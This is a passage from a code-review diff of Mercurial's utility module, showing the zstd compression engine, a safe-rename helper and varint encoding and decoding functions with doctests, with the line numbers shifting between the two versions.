3753 # Not all installs have the zstd module available. So defer importing
3750 # until first access.
3754 # until first access.
3751 try:
3755 try:
3752 from . import zstd
3756 from . import zstd
3753 # Force delayed import.
3757 # Force delayed import.
3754 zstd.__version__
3758 zstd.__version__
3755 return zstd
3759 return zstd
3756 except ImportError:
3760 except ImportError:
3757 return None
3761 return None
3758
3762
3759 def available(self):
3763 def available(self):
3760 return bool(self._module)
3764 return bool(self._module)
3761
3765
3762 def bundletype(self):
3766 def bundletype(self):
3763 """A modern compression algorithm that is fast and highly flexible.
3767 """A modern compression algorithm that is fast and highly flexible.
3764
3768
3765 Only supported by Mercurial 4.1 and newer clients.
3769 Only supported by Mercurial 4.1 and newer clients.
3766
3770
3767 With the default settings, zstd compression is both faster and yields
3771 With the default settings, zstd compression is both faster and yields
3768 better compression than ``gzip``. It also frequently yields better
3772 better compression than ``gzip``. It also frequently yields better
3769 compression than ``bzip2`` while operating at much higher speeds.
3773 compression than ``bzip2`` while operating at much higher speeds.
3770
3774
3771 If this engine is available and backwards compatibility is not a
3775 If this engine is available and backwards compatibility is not a
3772 concern, it is likely the best available engine.
3776 concern, it is likely the best available engine.
3773 """
3777 """
3774 return 'zstd', 'ZS'
3778 return 'zstd', 'ZS'
3775
3779
3776 def wireprotosupport(self):
3780 def wireprotosupport(self):
3777 return compewireprotosupport('zstd', 50, 50)
3781 return compewireprotosupport('zstd', 50, 50)
3778
3782
3779 def revlogheader(self):
3783 def revlogheader(self):
3780 return '\x28'
3784 return '\x28'
3781
3785
3782 def compressstream(self, it, opts=None):
3786 def compressstream(self, it, opts=None):
3783 opts = opts or {}
3787 opts = opts or {}
3784 # zstd level 3 is almost always significantly faster than zlib
3788 # zstd level 3 is almost always significantly faster than zlib
3785 # while providing no worse compression. It strikes a good balance
3789 # while providing no worse compression. It strikes a good balance
3786 # between speed and compression.
3790 # between speed and compression.
3787 level = opts.get('level', 3)
3791 level = opts.get('level', 3)
3788
3792
3789 zstd = self._module
3793 zstd = self._module
3790 z = zstd.ZstdCompressor(level=level).compressobj()
3794 z = zstd.ZstdCompressor(level=level).compressobj()
3791 for chunk in it:
3795 for chunk in it:
3792 data = z.compress(chunk)
3796 data = z.compress(chunk)
3793 if data:
3797 if data:
3794 yield data
3798 yield data
3795
3799
3796 yield z.flush()
3800 yield z.flush()
3797
3801
3798 def decompressorreader(self, fh):
3802 def decompressorreader(self, fh):
3799 zstd = self._module
3803 zstd = self._module
3800 dctx = zstd.ZstdDecompressor()
3804 dctx = zstd.ZstdDecompressor()
3801 return chunkbuffer(dctx.read_from(fh))
3805 return chunkbuffer(dctx.read_from(fh))
3802
3806
3803 class zstdrevlogcompressor(object):
3807 class zstdrevlogcompressor(object):
3804 def __init__(self, zstd, level=3):
3808 def __init__(self, zstd, level=3):
3805 # Writing the content size adds a few bytes to the output. However,
3809 # Writing the content size adds a few bytes to the output. However,
3806 # it allows decompression to be more optimal since we can
3810 # it allows decompression to be more optimal since we can
3807 # pre-allocate a buffer to hold the result.
3811 # pre-allocate a buffer to hold the result.
3808 self._cctx = zstd.ZstdCompressor(level=level,
3812 self._cctx = zstd.ZstdCompressor(level=level,
3809 write_content_size=True)
3813 write_content_size=True)
3810 self._dctx = zstd.ZstdDecompressor()
3814 self._dctx = zstd.ZstdDecompressor()
3811 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3815 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3812 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3816 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3813
3817
3814 def compress(self, data):
3818 def compress(self, data):
3815 insize = len(data)
3819 insize = len(data)
3816 # Caller handles empty input case.
3820 # Caller handles empty input case.
3817 assert insize > 0
3821 assert insize > 0
3818
3822
3819 if insize < 50:
3823 if insize < 50:
3820 return None
3824 return None
3821
3825
3822 elif insize <= 1000000:
3826 elif insize <= 1000000:
3823 compressed = self._cctx.compress(data)
3827 compressed = self._cctx.compress(data)
3824 if len(compressed) < insize:
3828 if len(compressed) < insize:
3825 return compressed
3829 return compressed
3826 return None
3830 return None
3827 else:
3831 else:
3828 z = self._cctx.compressobj()
3832 z = self._cctx.compressobj()
3829 chunks = []
3833 chunks = []
3830 pos = 0
3834 pos = 0
3831 while pos < insize:
3835 while pos < insize:
3832 pos2 = pos + self._compinsize
3836 pos2 = pos + self._compinsize
3833 chunk = z.compress(data[pos:pos2])
3837 chunk = z.compress(data[pos:pos2])
3834 if chunk:
3838 if chunk:
3835 chunks.append(chunk)
3839 chunks.append(chunk)
3836 pos = pos2
3840 pos = pos2
3837 chunks.append(z.flush())
3841 chunks.append(z.flush())
3838
3842
3839 if sum(map(len, chunks)) < insize:
3843 if sum(map(len, chunks)) < insize:
3840 return ''.join(chunks)
3844 return ''.join(chunks)
3841 return None
3845 return None
3842
3846
3843 def decompress(self, data):
3847 def decompress(self, data):
3844 insize = len(data)
3848 insize = len(data)
3845
3849
3846 try:
3850 try:
3847 # This was measured to be faster than other streaming
3851 # This was measured to be faster than other streaming
3848 # decompressors.
3852 # decompressors.
3849 dobj = self._dctx.decompressobj()
3853 dobj = self._dctx.decompressobj()
3850 chunks = []
3854 chunks = []
3851 pos = 0
3855 pos = 0
3852 while pos < insize:
3856 while pos < insize:
3853 pos2 = pos + self._decompinsize
3857 pos2 = pos + self._decompinsize
3854 chunk = dobj.decompress(data[pos:pos2])
3858 chunk = dobj.decompress(data[pos:pos2])
3855 if chunk:
3859 if chunk:
3856 chunks.append(chunk)
3860 chunks.append(chunk)
3857 pos = pos2
3861 pos = pos2
3858 # Frame should be exhausted, so no finish() API.
3862 # Frame should be exhausted, so no finish() API.
3859
3863
3860 return ''.join(chunks)
3864 return ''.join(chunks)
3861 except Exception as e:
3865 except Exception as e:
3862 raise error.RevlogError(_('revlog decompress error: %s') %
3866 raise error.RevlogError(_('revlog decompress error: %s') %
3863 forcebytestr(e))
3867 forcebytestr(e))
3864
3868
3865 def revlogcompressor(self, opts=None):
3869 def revlogcompressor(self, opts=None):
3866 opts = opts or {}
3870 opts = opts or {}
3867 return self.zstdrevlogcompressor(self._module,
3871 return self.zstdrevlogcompressor(self._module,
3868 level=opts.get('level', 3))
3872 level=opts.get('level', 3))
3869
3873
3870 compengines.register(_zstdengine())
3874 compengines.register(_zstdengine())
3871
3875
3872 def bundlecompressiontopics():
3876 def bundlecompressiontopics():
3873 """Obtains a list of available bundle compressions for use in help."""
3877 """Obtains a list of available bundle compressions for use in help."""
3874 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3878 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3875 items = {}
3879 items = {}
3876
3880
3877 # We need to format the docstring. So use a dummy object/type to hold it
3881 # We need to format the docstring. So use a dummy object/type to hold it
3878 # rather than mutating the original.
3882 # rather than mutating the original.
3879 class docobject(object):
3883 class docobject(object):
3880 pass
3884 pass
3881
3885
3882 for name in compengines:
3886 for name in compengines:
3883 engine = compengines[name]
3887 engine = compengines[name]
3884
3888
3885 if not engine.available():
3889 if not engine.available():
3886 continue
3890 continue
3887
3891
3888 bt = engine.bundletype()
3892 bt = engine.bundletype()
3889 if not bt or not bt[0]:
3893 if not bt or not bt[0]:
3890 continue
3894 continue
3891
3895
3892 doc = pycompat.sysstr('``%s``\n %s') % (
3896 doc = pycompat.sysstr('``%s``\n %s') % (
3893 bt[0], engine.bundletype.__doc__)
3897 bt[0], engine.bundletype.__doc__)
3894
3898
3895 value = docobject()
3899 value = docobject()
3896 value.__doc__ = doc
3900 value.__doc__ = doc
3897 value._origdoc = engine.bundletype.__doc__
3901 value._origdoc = engine.bundletype.__doc__
3898 value._origfunc = engine.bundletype
3902 value._origfunc = engine.bundletype
3899
3903
3900 items[bt[0]] = value
3904 items[bt[0]] = value
3901
3905
3902 return items
3906 return items
3903
3907
3904 i18nfunctions = bundlecompressiontopics().values()
3908 i18nfunctions = bundlecompressiontopics().values()
3905
3909
3906 # convenient shortcut
3910 # convenient shortcut
3907 dst = debugstacktrace
3911 dst = debugstacktrace
3908
3912
3909 def safename(f, tag, ctx, others=None):
3913 def safename(f, tag, ctx, others=None):
3910 """
3914 """
3911 Generate a name that it is safe to rename f to in the given context.
3915 Generate a name that it is safe to rename f to in the given context.
3912
3916
3913 f: filename to rename
3917 f: filename to rename
3914 tag: a string tag that will be included in the new name
3918 tag: a string tag that will be included in the new name
3915 ctx: a context, in which the new name must not exist
3919 ctx: a context, in which the new name must not exist
3916 others: a set of other filenames that the new name must not be in
3920 others: a set of other filenames that the new name must not be in
3917
3921
3918 Returns a file name of the form oldname~tag[~number] which does not exist
3922 Returns a file name of the form oldname~tag[~number] which does not exist
3919 in the provided context and is not in the set of other names.
3923 in the provided context and is not in the set of other names.
3920 """
3924 """
3921 if others is None:
3925 if others is None:
3922 others = set()
3926 others = set()
3923
3927
3924 fn = '%s~%s' % (f, tag)
3928 fn = '%s~%s' % (f, tag)
3925 if fn not in ctx and fn not in others:
3929 if fn not in ctx and fn not in others:
3926 return fn
3930 return fn
3927 for n in itertools.count(1):
3931 for n in itertools.count(1):
3928 fn = '%s~%s~%s' % (f, tag, n)
3932 fn = '%s~%s~%s' % (f, tag, n)
3929 if fn not in ctx and fn not in others:
3933 if fn not in ctx and fn not in others:
3930 return fn
3934 return fn
3931
3935
3932 def readexactly(stream, n):
3936 def readexactly(stream, n):
3933 '''read n bytes from stream.read and abort if less was available'''
3937 '''read n bytes from stream.read and abort if less was available'''
3934 s = stream.read(n)
3938 s = stream.read(n)
3935 if len(s) < n:
3939 if len(s) < n:
3936 raise error.Abort(_("stream ended unexpectedly"
3940 raise error.Abort(_("stream ended unexpectedly"
3937 " (got %d bytes, expected %d)")
3941 " (got %d bytes, expected %d)")
3938 % (len(s), n))
3942 % (len(s), n))
3939 return s
3943 return s
3940
3944
3941 def uvarintencode(value):
3945 def uvarintencode(value):
3942 """Encode an unsigned integer value to a varint.
3946 """Encode an unsigned integer value to a varint.
3943
3947
3944 A varint is a variable length integer of 1 or more bytes. Each byte
3948 A varint is a variable length integer of 1 or more bytes. Each byte
3945 except the last has the most significant bit set. The lower 7 bits of
3949 except the last has the most significant bit set. The lower 7 bits of
3946 each byte store the 2's complement representation, least significant group
3950 each byte store the 2's complement representation, least significant group
3947 first.
3951 first.
3948
3952
3949 >>> uvarintencode(0)
3953 >>> uvarintencode(0)
3950 '\\x00'
3954 '\\x00'
3951 >>> uvarintencode(1)
3955 >>> uvarintencode(1)
3952 '\\x01'
3956 '\\x01'
3953 >>> uvarintencode(127)
3957 >>> uvarintencode(127)
3954 '\\x7f'
3958 '\\x7f'
3955 >>> uvarintencode(1337)
3959 >>> uvarintencode(1337)
3956 '\\xb9\\n'
3960 '\\xb9\\n'
3957 >>> uvarintencode(65536)
3961 >>> uvarintencode(65536)
3958 '\\x80\\x80\\x04'
3962 '\\x80\\x80\\x04'
3959 >>> uvarintencode(-1)
3963 >>> uvarintencode(-1)
3960 Traceback (most recent call last):
3964 Traceback (most recent call last):
3961 ...
3965 ...
3962 ProgrammingError: negative value for uvarint: -1
3966 ProgrammingError: negative value for uvarint: -1
3963 """
3967 """
3964 if value < 0:
3968 if value < 0:
3965 raise error.ProgrammingError('negative value for uvarint: %d'
3969 raise error.ProgrammingError('negative value for uvarint: %d'
3966 % value)
3970 % value)
3967 bits = value & 0x7f
3971 bits = value & 0x7f
3968 value >>= 7
3972 value >>= 7
3969 bytes = []
3973 bytes = []
3970 while value:
3974 while value:
3971 bytes.append(pycompat.bytechr(0x80 | bits))
3975 bytes.append(pycompat.bytechr(0x80 | bits))
3972 bits = value & 0x7f
3976 bits = value & 0x7f
3973 value >>= 7
3977 value >>= 7
3974 bytes.append(pycompat.bytechr(bits))
3978 bytes.append(pycompat.bytechr(bits))
3975
3979
3976 return ''.join(bytes)
3980 return ''.join(bytes)
3977
3981
3978 def uvarintdecodestream(fh):
3982 def uvarintdecodestream(fh):
3979 """Decode an unsigned variable length integer from a stream.
3983 """Decode an unsigned variable length integer from a stream.
3980
3984
3981 The passed argument is anything that has a ``.read(N)`` method.
3985 The passed argument is anything that has a ``.read(N)`` method.
3982
3986
3983 >>> try:
3987 >>> try:
3984 ... from StringIO import StringIO as BytesIO
3988 ... from StringIO import StringIO as BytesIO
3985 ... except ImportError:
3989 ... except ImportError:
3986 ... from io import BytesIO
3990 ... from io import BytesIO
3987 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3991 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3988 0
3992 0
3989 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3993 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3990 1
3994 1
3991 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3995 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3992 127
3996 127
3993 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3997 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3994 1337
3998 1337
3995 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3999 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3996 65536
4000 65536
3997 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4001 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3998 Traceback (most recent call last):
4002 Traceback (most recent call last):
3999 ...
4003 ...
4000 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4004 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4001 """
4005 """
4002 result = 0
4006 result = 0
4003 shift = 0
4007 shift = 0
4004 while True:
4008 while True:
4005 byte = ord(readexactly(fh, 1))
4009 byte = ord(readexactly(fh, 1))
4006 result |= ((byte & 0x7f) << shift)
4010 result |= ((byte & 0x7f) << shift)
4007 if not (byte & 0x80):
4011 if not (byte & 0x80):
4008 return result
4012 return result
4009 shift += 7
4013 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now